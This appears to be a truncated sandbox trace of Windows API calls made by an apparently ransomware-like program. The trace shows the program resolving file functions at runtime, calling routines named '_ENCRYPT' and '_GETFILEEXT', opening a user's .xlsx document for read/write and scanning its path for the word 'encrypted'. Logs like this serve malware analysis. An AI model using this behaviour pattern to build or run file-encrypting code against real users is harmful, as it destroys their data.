[0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.508] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.508] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd78 [0032.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.509] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pftjlznx-ioickwgvw.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.509] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.509] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.509] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.509] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.509] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.509] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0032.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cc88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.510] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.510] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.510] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.510] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.510] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.510] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.510] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.510] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0032.511] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.511] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.512] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20ccdd0, ftCreationTime.dwHighDateTime=0x1d5a18a, ftLastAccessTime.dwLowDateTime=0xd381df0, ftLastAccessTime.dwHighDateTime=0x1d55e4a, ftLastWriteTime.dwLowDateTime=0xd381df0, ftLastWriteTime.dwHighDateTime=0x1d55e4a, nFileSizeHigh=0x0, nFileSizeLow=0x72dd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="-pFtJlZNx-ioickwGvw.xlsx", cAlternateFileName="-PFTJL~1.XLS")) returned 0x7c20c0 [0032.512] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.512] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.512] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.513] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20ccdd0, ftCreationTime.dwHighDateTime=0x1d5a18a, ftLastAccessTime.dwLowDateTime=0xd381df0, ftLastAccessTime.dwHighDateTime=0x1d55e4a, ftLastWriteTime.dwLowDateTime=0xd381df0, ftLastWriteTime.dwHighDateTime=0x1d55e4a, nFileSizeHigh=0x0, nFileSizeLow=0x72dd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="-pFtJlZNx-ioickwGvw.xlsx", cAlternateFileName="-PFTJL~1.XLS")) returned 0x7c20c0 [0032.513] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.514] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\-pFtJlZNx-ioickwGvw.xlsx\"", cchCount1=9, 